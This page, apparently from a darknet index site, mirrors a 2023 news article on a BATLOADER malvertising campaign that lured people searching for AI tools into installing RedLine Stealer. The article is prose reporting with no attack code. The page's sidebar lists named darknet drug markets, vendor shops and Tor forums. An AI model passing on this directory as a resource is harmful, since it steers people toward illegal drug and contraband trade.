Caution while searching for AI tools, Rogue websites distributing RedLine malware | Darknet Prime


Malicious Google Search advertisements for generative AI services such as ChatGPT and Midjourney are being utilized to direct users to dubious websites as part of a BATLOADER campaign designed to deliver RedLine Stealer malware



Onion Details



Page Clicks: 0

First Seen: 03/12/2024

Last Indexed: 10/23/2024

Domain Index Total: 101



Onion Content



cybercrime news Iris Green Writer Caution while searching for AI tools, Rogue websites distributing RedLine malware May 22, 2023 (Updated: July 18, 2023 ) Malicious Google Search advertisements are being utilized in a BATLOADER campaign to direct users to dubious websites offering generative AI services such as OpenAI ChatGPT and Midjourney. These advertisements, flagged by eSentire, exploit the popularity of these AI services which lack first-party standalone applications. The threat actors drive AI app-seekers to imposter web pages that promote fake apps. BATLOADER, a loader malware, spreads through drive-by downloads. Users searching for specific keywords on search engines encounter fraudulent ads. Clicking on these ads redirects them to rogue landing pages hosting malware. The installer file contains an executable file and a PowerShell script that downloads and loads RedLine Stealer from a remote server. After installation, the binary uses Microsoft Edge WebView2 to load the legitimate ChatGPT and Midjourney URLs in a pop-up window, avoiding suspicion. This isn't the first time BATLOADER's operators have exploited the AI trend to distribute malware. In March 2023, eSentire reported similar attacks using ChatGPT lures to deploy Vidar Stealer and Ursnif. The use of Google Search ads for this purpose has decreased since early 2023, indicating that measures have been taken to minimize their exploitation. These developments are part of a broader wave of phishing and scam campaigns capitalizing on the increasing use of AI tools. Threat actors distribute malware and fake apps through these campaigns. In related research, Sophos identified ChatGPT-related fleeceware apps in the Google Play and Apple App Store, which manipulate users into signing up for unwanted subscriptions. In recent weeks, both Meta and Palo Alto Networks Unit 42 have warned of rising fraudulent activity that mimics the ChatGPT service. These scams aim to harvest users' credit card details, perpetrate credit card fraud, and create chatbot browser extensions that steal victims' Facebook account information. Unit 42 observed a 910% surge in monthly registrations for domains related to ChatGPT between November 2022 and early April 2023. These findings follow Securonix's discovery of the OCX#HARVESTER phishing campaign targeting the cryptocurrency sector from December 2022 to March 2023, which used More_eggs, a JavaScript downloader that loads additional payloads. In January, eSentire traced one of the key operators of the malware-as-a-service (MaaS) to an individual in Montreal, Canada. The second threat actor associated with the group has been identified as a Romanian national known as Jack. Some similar articles you may like! Heinrich X Dec. 27, 2023 International Authorities Claims Alphv Blackcat Ransomware (Raas) Seizure International Law enforcement agencies claim to have seized the dark net leak site of the infamous ALPHV ransomware gang, also known as BlackCat. A ransomware f... cybercrime news Iris Green July 19, 2023 Wormgpt - Chatgpt Rival With 'No Ethical Boundaries', Sold On The Dark Web Researchers have warned about an AI tool called WormGPT, which has "no ethical boundaries or limitations" and is being advertised on the dark web for use in hac... cybercrime news Darknet Markets Top darknet markets, feel free to explore. Purchase at your own risk, but we don't encourage. Ares Market Mgm Grand Market Archetyp Market Drug Hub Market Super Market Omg!Omg! Market (Ru) Cypher Market Dark Matter Market Abacus Market More darknet markets Vendor Stores Some known vendors who run their own dark web stores. Smackers Vendor Shop Gammagoblin Heineken Express More vendor stores Search Engines Can't find what you're looking for? Maybe try one of the search engines. Tordex Torch Venus More search engines Forums Reach out to members of the darknet community and improve your research thru these forums. Dread Libre More forums Popular Top 8 Darknet Markets Mgm Grand Market Ares Darknet Market Omg!Omg! Darknet Market